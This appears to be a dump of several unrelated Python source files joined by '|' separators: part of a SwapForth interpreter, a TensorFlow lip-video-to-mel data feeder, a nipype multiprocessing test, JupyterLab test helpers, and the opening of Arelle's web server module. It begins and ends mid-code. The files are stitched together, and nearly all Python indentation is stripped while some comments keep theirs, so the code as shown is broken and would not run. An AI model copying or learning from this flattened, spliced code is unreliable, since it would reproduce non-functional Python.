self.code.append(partial(self.branch, self.d.pop()))
@setimmediate
def AHEAD(self):
self.lit(len(self.code))
self.code.append(self.branch)
@setimmediate
def m_if(self):
""" IF """
self.lit(len(self.code))
self.code.append(self.zbranch)
@setimmediate
def THEN(self):
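        # Patch the forward reference recorded by IF or AHEAD: the placeholder
        # branch/zbranch at code[p] is bound to the current end of the code
        # list as its jump target.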
p = self.d.pop()
self.code[p] = partial(self.code[p], len(self.code))
@setimmediate
def UNTIL(self):
self.code.append(partial(self.zbranch, self.d.pop()))
@setimmediate
def LITERAL(self):
self.code.append(partial(self.lit, self.d.pop()))
def dodo(self):
self.r.append(self.loopC)
self.r.append(self.loopL)
self.loopC = self.d.pop()
self.loopL = self.d.pop()
def qdodo(self):
self.r.append(self.loopC)
self.r.append(self.loopL)
self.loopC = self.d[-1]
self.loopL = self.d[-2]
self._xor()
def doloop(self):
before = self.w32(self.loopC - self.loopL) < 0
inc = self.d.pop()
self.loopC = self.w32(self.loopC + inc)
after = self.w32(self.loopC - self.loopL) < 0
if inc > 0:
finish = before > after
else:
finish = before < after
self.lit(finish)
@setimmediate
def DO(self):
self.leaves.append([])
self.code.append(self.dodo)
self.lit(len(self.code))
@setimmediate
def LOOP(self):
self.lit(1)
self.LITERAL()
self.plus_loop()
@setimmediate
def plus_loop(self):
""" +LOOP """
self.code.append(self.doloop)
self.UNTIL()
leaves = self.leaves.pop()
for p in leaves:
self.code[p] = partial(self.code[p], len(self.code))
self.code.append(self.UNLOOP)
@setimmediate
def question_do(self):
""" ?DO """
self.code.append(self.qdodo)
self.leaves.append([len(self.code)])
self.code.append(self.zbranch)
self.lit(len(self.code))
return
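        # NOTE: the alternative ?DO compilation below is unreachable dead code.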
self.code.append(self.two_dup)
self.code.append(self.equal)
self.leaves.append([len(self.code)])
self.code.append(self.zbranch)
self.code.append(self.dodo)
self.lit(len(self.code))
def I(self):
self.lit(self.loopC)
def J(self):
self.lit(self.r[-2])
def UNLOOP(self):
self.loopL = self.r.pop()
self.loopC = self.r.pop()
def QUIT(self):
print('QUIT')
raise swapforth.Bye
@setimmediate
def LEAVE(self):
self.leaves[-1].append(len(self.code))
self.code.append(self.branch)
def EVALUATE(self):
self.q('SOURCE >R >R >IN @ >R')
self.q('SOURCEID @ >R -1 SOURCEID !')
self.q('SOURCEC ! SOURCEA ! 0 >IN !')
self.interpret()
self.q('R> SOURCEID !')
self.q('R> >IN ! R> SOURCEA ! R> SOURCEC !')
def source_id(self):
""" SOURCE-ID """
self.q('SOURCEID @')
def interpret(self):
def consume1(c):
if self.d[-1] != 0:
r = self.ram[self.d[-2]] == c
else:
r = 0
if r:
self.lit(1)
self.slash_string()
return r
def da():
self.two_dup()
was = self.pops()
if len(was) == 3 and was[0] == "'" and was[2] == "'":
self.two_drop()
self.lit(ord(was[1]))
self.lit(1)
return
self.dlit(0)
self.two_swap()
if consume1(ord('$')):
base = 16
elif consume1(ord('#')):
base = 10
elif consume1(ord('%')):
base = 2
else:
base = None
neg = consume1(ord('-'))
self.to_number(base)
double = consume1(ord('.'))
if self.d.pop() != 0:
self.lit(-13)
self.THROW()
self.DROP()
if double:
if neg:
self.q('DNEGATE')
self.lit(2)
else:
self.DROP()
if neg:
self.NEGATE()
self.lit(1)
def doubleAlso():
da()
self.DROP()
def doubleAlso_comma():
da()
if self.d.pop() == 2:
self.SWAP()
self.LITERAL()
self.LITERAL()
while True:
self.parse_name()
if self.d[-1] == 0:
break
self.SFIND()
i = self.d.pop() + 1
self.state()
self.fetch()
i += 3 * self.d.pop()
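            # SFIND left -1 (word), 0 (not found) or 1 (immediate word), so i
            # is 0, 1 or 2; adding 3*STATE selects the interpretation row or
            # the compilation row of the dispatch table below.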
[ # nonimmediate number immediate
# ------------ ------ ---------
self.EXECUTE, doubleAlso, self.EXECUTE, # interpretation
self.compile_comma, doubleAlso_comma, self.EXECUTE # compilation
][i]()
self.two_drop()
def REFILL(self):
self.q('SOURCEID @')
if self.d.pop() == 0:
self.tib()
self.lit(256)
self.ACCEPT()
self.q('SOURCEC !')
self.q('TIB SOURCEA !')
self.q('0 >IN !')
self.lit(-1)
else:
self.lit(0)
def putcmd(self, cmd):
if cmd.endswith('\r'):
cmd = cmd[:-1]
self.tib()
tib = self.d.pop()
for i,c in enumerate(cmd):
self.ram[tib + i] = ord(c)
self.q('TIB SOURCEA !')
self.lit(len(cmd))
self.q('SOURCEC !')
self.q('0 >IN !')
import threading
try:
import queue
except ImportError:
import Queue as queue
class AsyncSwapForth(SwapForth):
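    # SwapForth variant driven from another thread: __init__ runs the
    # REFILL/interpret loop forever, and the overridden ACCEPT signals `ready`
    # and then blocks on the command queue for the next (writer, line) pair.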
def __init__(self, cmdq, ready, *options):
SwapForth.__init__(self, *options)
self.cmdq = cmdq
self.ready = ready
while True:
self.REFILL()
if not self.d.pop():
assert 0, "REFILL failed"
self.lit(self.xt(self.interpret))
self.CATCH()
e = self.d.pop()
if e:
codes = {
-1 : ": aborted",
-4 : ": stack underflow",
-9 : ": invalid memory address",
-13 : ": undefined word",
-14 : ": interpreting a compile-only word",
-28 : ": user interrupt"}
self.out('error: %d%s\n' % (e, codes.get(e, "")))
else:
self.out(' ok\r\n')
def ACCEPT(self):
(a, n) = self.popn(2)
self.ready.set()
        (self.out, s) = self.cmdq.get()
        s = s[:n]
ns = len(s)
self.ram[a:a + ns] = ba(s)
self.lit(ns)
class Tethered(swapforth.TetheredTarget):
def __init__(self, *options):
self.searchpath = ['.']
self.log = open("log", "w")
self.ser = None
self.verbose = False
self.interpreting = False
self.ready = threading.Event()
self.cmdq = queue.Queue()
self.t = threading.Thread(target = AsyncSwapForth, args = (self.cmdq, self.ready) + options)
self.t.setDaemon(True)
self.t.start()
self.ready.wait()
def issue(self, writer, cmd):
assert self.ready.is_set()
self.ready.clear()
self.cmdq.put((writer, cmd))
self.ready.wait()
def interactive_command(self, cmd):
self.issue(sys.stdout.write, cmd)
def command_response(self, cmd):
r = []
self.issue(lambda c: r.append(c), cmd)
return "".join(r)
if __name__ == '__main__':
cellsize = 4
endian = '<'
try:
options,args = getopt.getopt(sys.argv[1:], 'c:b')
optdict = dict(options)
if '-c' in optdict:
cellsize = int(optdict['-c'])
if '-b' in optdict:
endian = '>'
except getopt.GetoptError:
print("usage:")
print(" -c N cell size, one of 2,4 or 8")
print(" -b big-endian. Default is little-endian")
sys.exit(1)
dpans = {}
allw = set()
t = Tethered(cellsize, endian)
t.searchpath += ['../anstests', '../common']
# print set(t.sf.dict.keys()) - dpans['CORE']
try:
t.include('swapforth.fs')
[t.include(a) for a in args]
except swapforth.Bye:
pass
if 0:
words = set(t.command_response('words').split())
missing = dpans['CORE'] - words
print(len(missing), "MISSING CORE", " ".join(sorted(missing)))
print(words - allw)
t.shell()
|
feeder-checkpoint.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from npu_bridge.npu_init import *
from sklearn.model_selection import train_test_split
from synthesizer.utils.text import text_to_sequence
from synthesizer.infolog import log
import tensorflow as tf
import numpy as np
import threading
import time
import os
from os.path import dirname, join, basename, isfile
import cv2
_batches_per_group = 4 # Maybe change to 5 samples per batch
class Feeder:
"""
Feeds batches of data into queue on a background thread.
"""
def __init__(self, coordinator, hparams):
super(Feeder, self).__init__()
self._coord = coordinator
self._hparams = hparams
self._train_offset = 0
self._test_offset = 0
self.filelist = { 'train' : self._hparams.all_images, 'test' : self._hparams.all_test_images}
self.test_steps = 2
#pad input sequences with the <pad_token> 0 ( _ )
self._pad = 0
        #explicitly setting the padding to a value that doesn't originally exist in the spectrogram
#to avoid any possible conflicts, without affecting the output range of the model too much
if hparams.symmetric_mels:
self._target_pad = -hparams.max_abs_value
else:
self._target_pad = 0.
#Mark finished sequences with 1s
self._token_pad = 1.
#TODO
#with tf.device('/cpu:0'):
        # Create placeholders for inputs and targets. Don't specify batch size because we want
# to be able to feed different batch sizes at eval time.
batch_size = hparams.tacotron_batch_size
# batch_size =None
self._placeholders = [
tf.placeholder(tf.float32, shape=(batch_size, hparams.T, hparams.img_size,
hparams.img_size, 3), name="inputs"),
tf.placeholder(tf.int32, shape=(batch_size,), name="input_lengths"),
tf.placeholder(tf.float32, shape=(batch_size, hparams.mel_step_size, hparams.num_mels),
name="mel_targets"),
#tf.placeholder(tf.float32, shape=(None, None), name="token_targets"),
tf.placeholder(tf.int32, shape=(batch_size, ), name="targets_lengths"),
tf.placeholder(tf.int32, shape=(batch_size, None),
name="split_infos"),
# SV2TTS
tf.placeholder(tf.float32, shape=(batch_size, 256),
name="speaker_embeddings")
]
self.inputs_test, self.input_lengths_test, self.mel_targets_test, self.targets_lengths_test, self.split_infos_test, self.speaker_embeddings_test = self._placeholders
# Create queue for buffering data
#queue = tf.FIFOQueue(8, [tf.float32, tf.int32, tf.float32, tf.float32,
# tf.int32, tf.int32, tf.float32], name="input_queue")
queue = tf.FIFOQueue(8, [tf.float32, tf.int32, tf.float32,
tf.int32, tf.int32, tf.float32], name="input_queue")
self._enqueue_op = queue.enqueue(self._placeholders)
#self.inputs, self.input_lengths, self.mel_targets, self.token_targets, \
# self.targets_lengths, self.split_infos, self.speaker_embeddings = queue.dequeue()
print ("queue contents before : ", queue) #size())
self.inputs, self.input_lengths, self.mel_targets, \
self.targets_lengths, self.split_infos, self.speaker_embeddings = queue.dequeue()
print ("queue size after : ", queue.size())
self.dequeue_op = queue.dequeue()
self.inputs.set_shape(self._placeholders[0].shape)
self.input_lengths.set_shape(self._placeholders[1].shape)
self.mel_targets.set_shape(self._placeholders[2].shape)
#self.token_targets.set_shape(self._placeholders[3].shape)
self.targets_lengths.set_shape(self._placeholders[3].shape)
self.split_infos.set_shape(self._placeholders[4].shape)
self.speaker_embeddings.set_shape(self._placeholders[5].shape)
# Create eval queue for buffering eval data
#eval_queue = tf.FIFOQueue(1, [tf.float32, tf.int32, tf.float32, tf.float32,
# tf.int32, tf.int32, tf.float32], name="eval_queue")
eval_queue = tf.FIFOQueue(1, [tf.float32, tf.int32, tf.float32,
tf.int32, tf.int32, tf.float32], name="eval_queue")
self._eval_enqueue_op = eval_queue.enqueue(self._placeholders)
#self.eval_inputs, self.eval_input_lengths, self.eval_mel_targets, \
# self.eval_token_targets, self.eval_targets_lengths, \
# self.eval_split_infos, self.eval_speaker_embeddings = eval_queue.dequeue()
self.eval_inputs, self.eval_input_lengths, self.eval_mel_targets, \
self.eval_targets_lengths, \
self.eval_split_infos, self.eval_speaker_embeddings = eval_queue.dequeue()
self.eval_inputs.set_shape(self._placeholders[0].shape)
self.eval_input_lengths.set_shape(self._placeholders[1].shape)
self.eval_mel_targets.set_shape(self._placeholders[2].shape)
#self.eval_token_targets.set_shape(self._placeholders[3].shape)
self.eval_targets_lengths.set_shape(self._placeholders[3].shape)
self.eval_split_infos.set_shape(self._placeholders[4].shape)
self.eval_speaker_embeddings.set_shape(self._placeholders[5].shape)
def start_threads(self, session):
self._session = session
thread = threading.Thread(name="background", target=self._enqueue_next_train_group)
thread.daemon = True #Thread will close when parent quits
thread.start()
def _get_test_groups(self):
# print('Getting test group')
input_data, mel_target = self.getitem(split='test')
embed_target = np.zeros([256], dtype=np.float32)
return input_data, mel_target, embed_target, len(mel_target)
def make_test_batches(self):
start = time.time()
# Read a group of examples
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
#Test on entire test set
examples = [self._get_test_groups() for i in range(1)]
# Bucket examples based on similar output sequence length for efficiency
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log("\nGenerated %d test batches of size %d in %.3f sec" % (len(batches), n, time.time() - start))
return batches, r
def enqueue_test(self):
start = time.time()
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
examples = [self._get_next_example() for i in range(n * _batches_per_group)]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log("\nGenerated {} train batches of size {} in {:.3f} sec".format(len(batches), n, time.time() - start))
for batch in batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
def get_feed_dict(self):
start = time.time()
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
examples = [self._get_next_example() for i in range(n * _batches_per_group)]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log("\nGenerated {} train batches of size {} in {:.3f} sec".format(len(batches), n, time.time() - start))
for batch in batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
return feed_dict
def _enqueue_next_train_group(self):
while not self._coord.should_stop():
start = time.time()
# Read a group of examples
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
examples = [self._get_next_example() for i in range(n * _batches_per_group)]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log("\nGenerated {} train batches of size {} in {:.3f} sec".format(len(batches), n, time.time() - start))
for batch in batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
self._session.run(self._enqueue_op, feed_dict=feed_dict)
def _enqueue_next_test_group(self):
#Create test batches once and evaluate on them for all test steps
test_batches, r = self.make_test_batches()
while not self._coord.should_stop():
for batch in test_batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
self._session.run(self._eval_enqueue_op, feed_dict=feed_dict)
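    # getitem keeps sampling random items from the chosen split until it finds
    # one with a full window of T consecutive frames and a mel crop of exactly
    # mel_step_size frames, then returns the normalised frame window and mel.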
def getitem(self, split='train'):
while 1:
idx = np.random.randint(len(self.filelist[split]))
img_name = self.filelist[split][idx]
window_fnames = self.get_window(img_name)
if window_fnames is None:
idx = np.random.randint(len(self.filelist[split]))
continue
if len(window_fnames) != self._hparams.T :
idx = np.random.randint(len(self.filelist[split]))
continue
mel = np.load(os.path.join(os.path.dirname(img_name), 'mels.npz'))['spec'].T
mel = self.crop_audio_window(mel, img_name)
if (mel.shape[0] != self._hparams.mel_step_size):
idx = np.random.randint(len(self.filelist[split]))
continue
break
window = []
for fname in window_fnames:
img = cv2.imread(fname)
try:
img = cv2.resize(img, (self._hparams.img_size, self._hparams.img_size))
except:
continue
window.append(img)
x = np.asarray(window) / 255.
return x, mel
def _get_next_example(self):
"""Gets a single example (input, mel_target, token_target, linear_target, mel_length) from_ disk
"""
input_data, mel_target = self.getitem()
embed_target = np.zeros([256], dtype=np.float32)
#return input_data, mel_target, token_target, embed_target, len(mel_target)
return input_data, mel_target, embed_target, len(mel_target)
def _prepare_batch(self, batches, outputs_per_step):
assert 0 == len(batches) % self._hparams.tacotron_num_gpus
size_per_device = int(len(batches) / self._hparams.tacotron_num_gpus)
np.random.shuffle(batches)
inputs = None
mel_targets = None
#token_targets = None
targets_lengths = None
split_infos = []
targets_lengths = np.asarray([x[-1] for x in batches], dtype=np.int32) #Used to mask loss
input_lengths = np.asarray([len(x[0]) for x in batches], dtype=np.int32)
for i in range(self._hparams.tacotron_num_gpus):
batch = batches[size_per_device*i:size_per_device*(i+1)]
input_cur_device, input_max_len = self._prepare_inputs([x[0] for x in batch])
inputs = np.concatenate((inputs, input_cur_device), axis=1) if inputs is not None else input_cur_device
mel_target_cur_device, mel_target_max_len = self._prepare_targets([x[1] for x in batch], outputs_per_step)
mel_targets = np.concatenate(( mel_targets, mel_target_cur_device), axis=1) if mel_targets is not None else mel_target_cur_device
#Pad sequences with 1 to infer that the sequence is done
#token_target_cur_device, token_target_max_len = self._prepare_token_targets([x[2] for x in batch], outputs_per_step)
#token_targets = np.concatenate((token_targets, token_target_cur_device),axis=1) if token_targets is not None else token_target_cur_device
split_infos.append([input_max_len, mel_target_max_len])
split_infos = np.asarray(split_infos, dtype=np.int32)
### SV2TTS ###
#embed_targets = np.asarray([x[3] for x in batches])
embed_targets = np.asarray([x[2] for x in batches])
##############
#return inputs, input_lengths, mel_targets, token_targets, targets_lengths, \
# split_infos, embed_targets
return inputs, input_lengths, mel_targets, targets_lengths, \
split_infos, embed_targets
def _prepare_inputs(self, inputs):
max_len = max([len(x) for x in inputs])
return np.stack([self._pad_input(x, max_len) for x in inputs]), max_len
def _prepare_targets(self, targets, alignment):
max_len = max([len(t) for t in targets])
data_len = self._round_up(max_len, alignment)
return np.stack([self._pad_target(t, data_len) for t in targets]), data_len
'''
def _prepare_token_targets(self, targets, alignment):
max_len = max([len(t) for t in targets]) + 1
data_len = self._round_up(max_len, alignment)
return np.stack([self._pad_token_target(t, data_len) for t in targets]), data_len
'''
def _pad_input(self, x, length):
return np.pad(x, (0, length - x.shape[0]), mode="constant", constant_values=self._pad)
def _pad_target(self, t, length):
return np.pad(t, [(0, length - t.shape[0]), (0, 0)], mode="constant", constant_values=self._target_pad)
def _pad_token_target(self, t, length):
return np.pad(t, (0, length - t.shape[0]), mode="constant", constant_values=self._token_pad)
def _round_up(self, x, multiple):
remainder = x % multiple
return x if remainder == 0 else x + multiple - remainder
def _round_down(self, x, multiple):
remainder = x % multiple
return x if remainder == 0 else x - remainder
####### MY FUNCTIONS##################
def get_frame_id(self, frame):
return int(basename(frame).split('.')[0])
def get_window(self, center_frame):
center_id = self.get_frame_id(center_frame)
vidname = dirname(center_frame)
if self._hparams.T%2:
window_ids = range(center_id - self._hparams.T//2, center_id + self._hparams.T//2 + 1)
else:
window_ids = range(center_id - self._hparams.T//2, center_id + self._hparams.T//2)
window_fnames = []
for frame_id in window_ids:
frame = join(vidname, '{}.jpg'.format(frame_id))
if not isfile(frame):
return None
window_fnames.append(frame)
return window_fnames
def crop_audio_window(self, spec, center_frame):
# estimate total number of frames from spec (num_features, T)
# num_frames = (T x hop_size * fps) / sample_rate
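        # Illustrative numbers (not taken from hparams): with hop_size=200,
        # sample_rate=16000 and fps=25, each spectrogram frame spans 200/16000 s,
        # so total_num_frames == spec.shape[0] * 200 * 25 / 16000 == spec.shape[0] / 3.2.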
start_frame_id = self.get_frame_id(center_frame) - self._hparams.T//2
total_num_frames = int((spec.shape[0] * self._hparams.hop_size * self._hparams.fps) / self._hparams.sample_rate)
start_idx = int(spec.shape[0] * start_frame_id / float(total_num_frames))
end_idx = start_idx + self._hparams.mel_step_size
return spec[start_idx : end_idx, :]
|
test_legacymultiproc_nondaemon.py
|
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Testing module for functions and classes from multiproc.py
"""
# Import packages
import os
import sys
from tempfile import mkdtemp
from shutil import rmtree
import pytest
import nipype.pipeline.engine as pe
from nipype.interfaces.utility import Function
def mytestFunction(insum=0):
'''
Run a multiprocessing job and spawn child processes.
'''
# need to import here since this is executed as an external process
import multiprocessing
import os
import tempfile
import time
numberOfThreads = 2
# list of processes
t = [None] * numberOfThreads
# list of alive flags
a = [None] * numberOfThreads
# list of tempFiles
f = [None] * numberOfThreads
def dummyFunction(filename):
'''
This function writes the value 45 to the given filename.
'''
j = 0
for i in range(0, 10):
j += i
# j is now 45 (0+1+2+3+4+5+6+7+8+9)
with open(filename, 'w') as f:
f.write(str(j))
for n in range(numberOfThreads):
# mark thread as alive
a[n] = True
# create a temp file to use as the data exchange container
tmpFile = tempfile.mkstemp('.txt', 'test_engine_')[1]
f[n] = tmpFile # keep track of the temp file
t[n] = multiprocessing.Process(target=dummyFunction, args=(tmpFile, ))
# fire up the job
t[n].start()
# block until all processes are done
allDone = False
while not allDone:
time.sleep(1)
for n in range(numberOfThreads):
a[n] = t[n].is_alive()
if not any(a):
# if no thread is alive
allDone = True
# here, all processes are done
# read in all temp files and sum them up
total = insum
for ff in f:
with open(ff) as fd:
total += int(fd.read())
os.remove(ff)
return total
def run_multiproc_nondaemon_with_flag(nondaemon_flag):
'''
Start a pipe with two nodes using the resource multiproc plugin and
passing the nondaemon_flag.
'''
cur_dir = os.getcwd()
temp_dir = mkdtemp(prefix='test_engine_')
os.chdir(temp_dir)
pipe = pe.Workflow(name='pipe')
f1 = pe.Node(
interface=Function(
function=mytestFunction,
input_names=['insum'],
output_names=['sum_out']),
name='f1')
f2 = pe.Node(
interface=Function(
function=mytestFunction,
input_names=['insum'],
output_names=['sum_out']),
name='f2')
pipe.connect([(f1, f2, [('sum_out', 'insum')])])
pipe.base_dir = os.getcwd()
f1.inputs.insum = 0
pipe.config['execution']['stop_on_first_crash'] = True
# execute the pipe using the LegacyMultiProc plugin with 2 processes and the
# non_daemon flag to enable child processes which start other
# multiprocessing jobs
execgraph = pipe.run(
plugin="LegacyMultiProc",
plugin_args={
'n_procs': 2,
'non_daemon': nondaemon_flag
})
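    # Daemonic processes are not allowed to have children, so with
    # non_daemon=False the multiprocessing.Process calls inside mytestFunction
    # fail and the pipeline raises; with non_daemon=True the workers are
    # non-daemonic and the child jobs can run.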
names = [
'.'.join((node._hierarchy, node.name)) for node in execgraph.nodes()
]
node = list(execgraph.nodes())[names.index('pipe.f2')]
result = node.get_output('sum_out')
os.chdir(cur_dir)
rmtree(temp_dir)
return result
def test_run_multiproc_nondaemon_false():
'''
    This is the entry point for the test. A pipeline of multiprocessing jobs
    is executed twice: first without the nondaemon flag, then with it.
Since the processes of the pipe start child processes, the execution only
succeeds when the non_daemon flag is on.
'''
shouldHaveFailed = False
try:
# with nondaemon_flag = False, the execution should fail
run_multiproc_nondaemon_with_flag(False)
except:
shouldHaveFailed = True
assert shouldHaveFailed
def test_run_multiproc_nondaemon_true():
# with nondaemon_flag = True, the execution should succeed
result = run_multiproc_nondaemon_with_flag(True)
    assert result == 180  # two pipeline nodes * numberOfThreads (2) * 45 == 180
|
utils.py
|
import errno
import os
import sys
from os.path import join as pjoin
from binascii import hexlify
from threading import Thread, Event
try:
from unittest.mock import patch
except ImportError:
from mock import patch # py2
from ipython_genutils.tempdir import TemporaryDirectory
from jupyterlab.labapp import LabApp
from notebook.tests.launchnotebook import NotebookTestBase
from notebook.utils import url_path_join
import jupyter_core
from traitlets.config import Config
from tornado.ioloop import IOLoop
class LabTestBase(NotebookTestBase):
@classmethod
def setup_class(cls):
cls.tmp_dir = TemporaryDirectory()
def tmp(*parts):
path = os.path.join(cls.tmp_dir.name, *parts)
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
return path
cls.home_dir = tmp('home')
data_dir = cls.data_dir = tmp('data')
config_dir = cls.config_dir = tmp('config')
runtime_dir = cls.runtime_dir = tmp('runtime')
cls.notebook_dir = tmp('notebooks')
cls.env_patch = patch.dict('os.environ', {
'HOME': cls.home_dir,
'PYTHONPATH': os.pathsep.join(sys.path),
'IPYTHONDIR': pjoin(cls.home_dir, '.ipython'),
'JUPYTER_NO_CONFIG': '1', # needed in the future
'JUPYTER_CONFIG_DIR': config_dir,
'JUPYTER_DATA_DIR': data_dir,
'JUPYTER_RUNTIME_DIR': runtime_dir,
})
cls.env_patch.start()
cls.path_patch = patch.multiple(
jupyter_core.paths,
SYSTEM_JUPYTER_PATH=[tmp('share', 'jupyter')],
ENV_JUPYTER_PATH=[tmp('env', 'share', 'jupyter')],
SYSTEM_CONFIG_PATH=[tmp('etc', 'jupyter')],
ENV_CONFIG_PATH=[tmp('env', 'etc', 'jupyter')],
)
cls.path_patch.start()
config = cls.config or Config()
config.NotebookNotary.db_file = ':memory:'
cls.token = hexlify(os.urandom(4)).decode('ascii')
started = Event()
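        # The server runs on a background thread; `started` is set from an
        # IOLoop callback once the app begins (and in the finally block if
        # start() fails), so this method can block on it before polling the
        # server with wait_until_alive().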
def start_thread():
app = cls.notebook = LabApp(
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir,
data_dir=cls.data_dir,
runtime_dir=cls.runtime_dir,
notebook_dir=cls.notebook_dir,
base_url=cls.url_prefix,
config=config,
allow_root=True,
token=cls.token,
)
# don't register signal handler during tests
app.init_signal = lambda: None
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize(argv=[])
app.log.propagate = True
app.log.handlers = []
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
app.session_manager.close()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.daemon = True
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
class APITester(object):
"""Wrapper for REST API requests"""
url = '/'
def __init__(self, request):
self.request = request
def _req(self, verb, path, body=None):
response = self.request(verb,
url_path_join(self.url, path), data=body)
if 400 <= response.status_code < 600:
try:
response.reason = response.json()['message']
except Exception:
pass
response.raise_for_status()
return response
|
CntlrWebMain.py
|
'''
Created on Oct 3, 2010
Use this module to start Arelle in web server mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle.webserver.bottle import Bottle, request, response, static_file
from arelle.Cntlr import LogFormatter
import os, io, sys, time, threading, uuid
from arelle import Version
from arelle.FileSource import FileNamedStringIO
_os_pid = os.getpid()
def startWebserver(_cntlr, options):
"""Called once from main program in CmtlrCmdLine to initiate web server on specified local port.
To test WebServer run from source in IIS, use an entry like this: c:\python33\python.exe c:\\users\\myname\\mySourceFolder\\arelleCmdLine.py %s
    :param options: OptionParser options from parse_args of the main argv arguments; the *webserver* argument provides the host name and port on which to start the web server.
:type options: optparse.Values
"""
global imagesDir, cntlr, optionsPrototype
cntlr = _cntlr
imagesDir = cntlr.imagesDir
optionValuesTypes = _STR_NUM_TYPES + (type(None),)
optionsPrototype = dict((option,value if isinstance(value,_STR_NUM_TYPES) else None)
for option in dir(options)
for value in (getattr(options, option),)
if isinstance(value,optionValuesTypes) and not option.startswith('_'))
host, sep, portServer = options.webserver.partition(":")
port, sep, server = portServer.partition(":")
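    # options.webserver has the form host:port[:server]; an empty server name
    # uses bottle's built-in server, 'wsgi' makes this function return the app
    # for an external WSGI container, 'cgi' answers a single CGI request, and
    # any other name is passed through to bottle as the server backend.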
# start a Bottle application
app = Bottle()
GETorPOST = ('GET', 'POST')
GET = 'GET'
POST = 'POST'
# install REST API interfaces
# if necessary to support CGI hosted servers below root, add <prefix:path> as first part of routes
# and corresponding arguments to the handler methods
app.route('/rest/login', GET, login_form)
app.route('/rest/login', POST, login_submit)
app.route('/rest/logout', GET, logout)
app.route('/favicon.ico', GET, arelleIcon)
app.route('/rest/xbrl/<file:path>/open', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/close', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/validation/xbrl', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/DTS', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/concepts', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/pre', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/cal', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/dim', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/facts', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/factTable', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/roleTypes', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/arcroleTypes', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/formulae', GETorPOST, validation)
app.route('/rest/xbrl/validation', GETorPOST, validation)
app.route('/rest/xbrl/view', GETorPOST, validation)
app.route('/rest/xbrl/open', GETorPOST, validation)
app.route('/rest/xbrl/close', GETorPOST, validation)
app.route('/images/<imgFile>', GET, image)
app.route('/rest/xbrl/diff', GET, diff)
app.route('/rest/configure', GET, configure)
app.route('/rest/stopWebServer', GET, stopWebServer)
app.route('/quickbooks/server.asmx', POST, quickbooksServer)
app.route('/rest/quickbooks/<qbReport>/xbrl-gl/<file:path>', GET, quickbooksGLrequest)
app.route('/rest/quickbooks/<qbReport>/xbrl-gl/<file:path>/view', GET, quickbooksGLrequest)
app.route('/rest/quickbooks/<qbReport>/xbrl-gl/view', GET, quickbooksGLrequest)
app.route('/rest/quickbooks/response', GET, quickbooksGLresponse)
app.route('/quickbooks/server.html', GET, quickbooksWebPage)
app.route('/quickbooks/localhost.crt', GET, localhostCertificate)
app.route('/localhost.crt', GET, localhostCertificate)
app.route('/help', GET, helpREST)
app.route('/about', GET, about)
app.route('/', GET, indexPageREST)
if server == "cgi":
# catch a non-REST interface by cgi Interface (may be a cgi app exe module, etc)
app.route('<cgiAppPath:path>', GETorPOST, cgiInterface)
if server == "wsgi":
return app
elif server == "cgi":
if sys.stdin is None:
sys.stdin = open(os.devnull, 'r')
app.run(server=server)
sys.exit(0)
elif server:
app.run(host=host, port=port or 80, server=server)
else:
app.run(host=host, port=port or 80)
def cgiInterface(cgiAppPath):
# route request according to content
#with open(r"c:\temp\tracecgi.log", "at", encoding="utf-8") as fh:
# fh.write("trace 2 arg={}\n".format(cgiAppPath))
